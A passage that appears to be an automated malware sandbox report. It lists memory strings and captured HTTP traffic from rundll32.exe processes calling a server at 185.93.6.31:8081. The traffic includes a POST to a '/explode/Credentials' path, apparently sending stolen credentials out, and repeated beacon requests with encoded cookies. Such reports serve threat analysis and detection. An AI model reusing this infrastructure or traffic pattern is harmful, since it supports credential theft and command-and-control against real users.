          Source: rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJeQ
          Source: rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJindows
          Source: rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJkh
          Source: rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJmK
          Source: rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJography
          Source: rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJph
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJsc
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJws
          Source: rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJx
          Source: rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ~h
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2$c
          Source: rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2&
          Source: rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2;/3
          Source: rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2L
          Source: rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2dll
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=BEEBAOMDCBHADPPFCEHFDNPACA6
          Source: rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO
          Source: rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=KDDINCJEJFALOEKAJEAIOLKAJB
          Source: rundll32.exe, 00000005.00000003.335866871.00000243BC911000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000002.641154135.00000243BE628000.00000004.00000001.sdmpString found in binary or memory: http://jqueryui.com
          Source: unknownHTTP traffic detected: POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO HTTP/1.1Accept: image/*, application/xml, text/htmlAccept-Language: es-peAccept-Encoding: gzip, *User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Content-Length: 11120Connection: Keep-AliveCache-Control: no-cache
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00128 HttpOpenRequestA,VirtualAlloc,InternetReadFile,
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc3_iPE1_Vjq56xPxznPYCYBUHbVMTZf5vxQaRoTv0edTWJcgZ5LwLJnPm7dBsqNBWEXJlsZSPGhuf9XsqqC4HJa2koZmGEyVn-IZh37nM6NBwdS6ebkug90jlQud71sjfImxBQX6LVaJIkUUgAQN4xdzI3l1MCakLqA79lcimV7goHEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=Q5hpQs5v1lLXXL79aYNOPZXYnxsOaoRhvLaKxRmYapzsO5INT1NEHR7ZxGVO8wQmPN3sdmwGzHIO8u1Y9VSB3ZOTbw4su34w3LFJu4vo30P1denpMflc7PjWYAyP5qxVNjYxO3QOUChWqJg1ui4s1jjWKFCimqGq9-ei73ZX1l4hNQ9tUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=kmf3XTcOg_M1Un1ceOnglMUgQX9lOhjCEoU-77eE-OnhjXEsAvAHxtBYmt4NGrWRv_vKt0zBZFmX4pa376L-PojOC9qmp8nzLnkx3BccOQu4rxJJpurRp5pdd5QNIrusZzjTStJrAfcMoZRbZfiG9SPWq3cveQOrAtMMsU10KOz8Or69User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rr1CTCJFQJw5lxGLFElypPVx7bIGQYubNYztrcljAoNOPd-YUu72BGEXg6oOdndJ1hGq4ohp9TVyyUKTYdo_JKEqZ47K6Nz2hQ81os6LIQped7qWOpZZftwEM5D9BwCoXoKbAMdnVXGJVDTQgXCt818tcUk2pH1eQ8o9KwosN6Go8jwAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7XJRhGCF7pR5toY7x2l2-zsyp92ggLynElyyA7dyUlpC0arL4bl827Az_KPgGTzgkjfUsMLs9LSgGNWeW765Gz15V8iCUUb2cltxfSUC54Vbn9EvnxNkKlY8WMohDJSTmNwJ_drkaO74QqDzFMQUEJY8EJYMcJlsWQ2aKdi97piP3zerUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc_1otimgQza-n-jl0HiayqIQ4CKkho9_S08EFgs-hYOJXPT7VgFOT_wmCHisrduUFPISKNpZqZ4SpRIAAr8wWdmCSVJD8sMwdEzI_i0O_RXBxC2SULTWHX1dWviirlTiJDRtT3DAwjjCZakilCECsx-qYjA0QFU7XsOTqLcKhMTkrxCUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=AwU8qo_9PnqUL29tufEMQljJk1Sr-fV9mDSTS2TbfGXjhaF-_1aI4syv_Uyjzgmve6nUBCXRi9PfcTx1zGJBwgySGWhnUKIQKLdLRGMzX-zzz8Rwly4nmHG8TXZQv35O8zrl5mrfK5ck7Eo2LMjTFfKVD6-bHAO47nJDzaeUSUcFSkLmUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=B47OKYp5cTmTShmWLZXpVtHOOHBKfCMK-KAtrl2OzfeoLTVmC0XjdlrPYw4K5aNNeMtLHSgQaxlK5EozsUImtteFyGVordlbmKfu0M_-eCixY06Cde_7h7zAx2fL8As-ciCWUDAY90MSvj9e_jiLvXzAjzvmjAbBs_EFhDJBcTVlI6gGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=iU1Z0iwkLXwueNPTY8NOG94K7_B-ELZNCa-QYKyuVmb6p9-jGdqpSctyNFEWMBsepNFkOFfrytaMyDg49IhQsZPkpVW9jWd8NVOfUww2l4SjhbzGvcB_KIF32RsWCBUjfBJ9xclBr3gXizrUftIoejj8Bfg0U60kGfmiPlZehmPnEBAyUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qOm_jCQRvVw_w-xLEh2PZPMlEHIAFXZbM9gQbc83_0NIaSJYVLoLxGdDfmoIIoqJ0EVXIo49CPV0nb9TZ47C5Kd-mk7MvCE2g1vIYsjf3MpYI0dWPMKkvtpQzlD7U_1oWNZmwMEzqLGPAMkQhyRQM1l5jIkw8ICeRZ7A6wx4ymGupsHAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=58MJJWo0tjVzB96azdguWjGD_3yqMeQGGO3qor3DCvtIYPJq6wgkerqCpALqqGRBmIaMEchdrBWqqY0_UQ_hujfID2mI4B5XeOop3C-zvyRRLomOlaI8i1yNAGsrvcwykm1RXNBVME_y8_hSHnVMsZyNSDcGwcHNU7zCiNIMtjmFbm8KUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NOIpFJGLXbqT16MV3mw-3WOlnzbDv8aLtADgphEBJqBHCK9lpHXZj3bdRJern2vYGX4U_upEuhAxZ0j-SScgdy5L1ZMAIhe6iPzvlbGZ50IeKswAAG8P7jzYqd2rp2Xlwb0NA3Tu376qJEoSw31YvIVTdT6J_N3ipFbS-Ovx9qVav2D0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8dZTfX0uUa1m_AC6SyJjlaoa_INZKpqqauf8nJYIE7IRVs6pDYXnNT58kptRHWZ4iXq709cC5AQtolOiPrEuFf5Bdr-Vg83H2mQkk5HgMDsBHKunZf1IT4NvIqGibBGZAemKMZgMREDWPyXh3hu8wgBGYHhpz2xvHKEsGlVHJpD3mS0xUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=EdI9V5wlgkeFFuroO8kaKMeSyw5cINB07vze0EvSPom-ccYYHRkQCEyTkHAcuVAzbpe4Yz5MmGdcuLlNpx7VyMHZOxt-8Soljvsdrtmii1anP738Y7MI-aqcNBndrPhAZHxlLiZEBD0E4swg6GR4w2qcfEXw0PW_pa32-iQdgktzf1t4User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VCBqBNjYaNTDCjnD7tRa7A_sxfr83KPTzxHF5TP-Ksu0oPfQqHPeTJuKq-L0618BLIyCqnL03X2IVGrbm0cXbFu3T8YwdfS-f5Id6jQWCUKk6pLewAtxNiaZG9gHmijgpB-zSD36fTlzyRyYe-2Fu6WwWQHMOVUWuVcVY_CxH-lSbxRIUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qYGqnwzo3jEOtCCeQw-9Vv7GHL1e3EUAKWNjLYxipSvaayzuORZaBOu-xxw2_OhThB2XdXcnOZusBMt11ESj_LMoVhidQZQxFZ9sHiz6ZMmDSU-LnQyMZaG7KlY2xOZuXN6OiOmNXDU3R8mZXh7bNxgw9rUUn15pOTVRc3aSdS7H3ON_User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=z3wjoEKLnLBbuPQf5WcE3xk81fmCjs6DMFLAJ5V8IH5g39jvw7cO_5I9jofCF07EsDmmlODihpCCFqe6ebDLPx93JeygXzTSUFUDWQcMlaF5kaMLvR0WDnQyKu4DAua3utJ72fjqGsraTNLXNspmNLQyYrIufutIewPoDfqznLyt0UWPUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=pRHTCAB4p6YCJFkJT5_EwfJWZSpSTDyXJfMauoDy3LzW-1V5NYYjk-cuvos6bJHEiI3u4nu3QAyglLLi2NTaa7-4L4-R0e2mGQ8ViSBqHV6P2TYckZz18q0rU8E6VJ_5UE73H-UdJaI717AOUo6ioBSgjyIYDyf-NaUo5HoCDLnLTJroUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=s2BnkT-YZUEkSjRWCZRXeeisyG8bnK5GKFHIcNS-J15T4PpFTzPT2XzKpncTq1KUy8yPP5W00OhvFGdOfAca-bz3QlPXNfkrmNIQf9NWBNdDqp9LJ0t8o8HZFk3g2iV1Q1--3dq6cKyUiRENnK2ILkLwVJQreViDXhcY9hfxEny1LxndUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=YPUU7u0Cq_70McNRSu4zkba14rctB_nNn9v3aTr1FzDPVu-hbD45sT20ucltnnmKH7CR2k9rsd4tn5D01jn8cbD-EqIP1gOc_9w0F6iFou_WGJRFEpQhQNu7HaCsi9H5FVtMl1djLYR1xeWZmUNRehu7VfyB99wG1IrfQ1U6q_ICWHLBUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=G3ex6b4exUe8Qjvo8fmmIEwwB8vsKl52m5V4Wz6Uvl1onTeYi-BBcllI3GqECvMlNuuMA8XRIu0e8tADZrK4igHeTW4vt49Hp2l3aJ4Mf78xv1T9L_qXExNNMSCEMv0Y7iiV_lt7R0OFsdLv7OjAQarG7cOmaUUfi8NKBcRkblh1KvgJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rpXGOiJtxOo5v5X9FGH20vVZacQGaQ_tNaRp28lLhvVOFVvuUsZycmE_B9wOXvM_1jkulIhBcUNy4cblYfK7UqEC4_jKwFiAhSex1M6jpXxeXz7gOr7dCNwst-b9L4TeXqofdsdP0QeJfLCmgVgphV8F9T82jPkoQ-K5XQoEs9eo2rh2User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXUUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=3KDMj3nJuCF7lUaONi7bRovneq0r_SMQXEIFPflDwzuvSkr-TDc8FJ6foQxD3Y5D8TzxZQIGX4vZJa1loWXF7MYJMAjoYPIhYL4KDlnbAtn2aCmb6C3qddSaTEZD5YB-Kf_omJysOiVCZq-JKz-9J20RkKVhvjh5TBQ3YwOzEz6y_YVvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ButdX4sc4k-SL4rgLPB6INCrqwZLGbB8-cW-2FzrXoGpSKYQCiBwAFuq8HgLgDA7ea7Yayl1-G9LgdlFsCe1wNbgWxNpyEotmcJ9ps6b616wBt30dIpo8b2lVBHKlZhIc0UFJjF9ZDUT26wo_10Yy32lHE3n6ZW3spSW8jMk4kNkRjtwUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=XnpmP9KCZO_JUDX45I5W1wW2ycH2hq_oxUvJ3jmkJvC--vvroinSd5HQp9n-sVM6JtaOkXiu0UaCDmbgkR0bV1HtQ_06L_iFdcgR0T5MBXmusJ7lylF9DSzDF-MNwCTbrkW_czegcQJ5kxCjcbeJgK_qVTrGY1ktsw0ZWPrrE9JYNRhzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-j9zHHfIzAxu-6Sj0CRUYyx_hUW3zZ4_BRGQm6A_cMJVnIhT9vReQ6d-3jv3VB54hXr2KNWh1iy3VfcGTPObgyo0dVCVHGRuZRZT5TJPxR1M0vO3iF5GskFxelI2QbYLj5ErZc2pSnbvD4JrA4k2iIFxMg4bPbv0TkC4sc_wzACYkhUzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
